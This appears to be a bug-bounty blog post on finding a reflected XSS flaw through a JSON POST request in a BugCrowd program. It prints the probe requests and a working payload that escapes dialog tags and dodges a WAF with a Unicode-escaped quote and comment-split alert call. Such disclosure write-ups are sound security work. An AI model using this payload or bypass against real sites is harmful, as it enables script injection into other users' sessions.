.png)
1 day ago
11 BOOK THIS SPACE FOR AD
ARTICLE AD
Hi, welcome to my first blog! In this post, I will share my experience of discovering a Reflected XSS vulnerability in a public BugCrowd program. Let’s dive into the details of this XSS vulnerability.
In this article, we’ll explore the mechanics of Reflected XSS, its potential impacts, and provide a practical example to help clarify how this vulnerability works.
First, I observed a POST request that sends data in JSON format to fetch information from the server. Here is our attack vector:
POST /endpoint HTTP/2Host: www.example.com
Accept: */*
Content-Length: 208
{"modalData":{
"image":"https://test.com",
"title":"fooo",
"price":"",
"quantity":1,
"subTotal":"",
"totalQuantity":1,
"loyaltyPionts":25
}
}
I then attempted to inject unique characters into every value and analyzed what was reflected in the response. Everything was reflected in [ <dialog> ] and [ <modal-dialog> ], but all had HTML encoding safeguards in place, except for the [ image ]element.
POST /endpoint HTTP/2Host: www.example.com
Accept: */*
Content-Length: 208
{"modalData":{
"image":"https://test.comRezk1><",
"title":"foooRezk2><",
"price":"Rezk3><",
"quantity":"1Rezk4><",
"subTotal":"Rezk5><",
"totalQuantity":"Rezk6><",
"loyaltyPionts":"Rezk7><"
}
}
Next, I injected an XSS payload by converting the quotation mark [ “ ] to Unicode and enclosing the ` alert ` function in JavaScript comments [ /**/ ] to bypass the WAF. This approach worked successfully. 😄
"Rezk\u0022></dialog></modal-dialog><h1>This Is A Malicious</h1><input type=hidden
oncontentvisibilityautostatechange=/**/alert/**/(document.location)
style=content-visibility:auto>"
In conclusion, remember to use fuzzing and automation, but don’t underestimate the power of manual testing.
Please don’t forget to follow me!
Bengali (Bangladesh) · 
English (United States) ·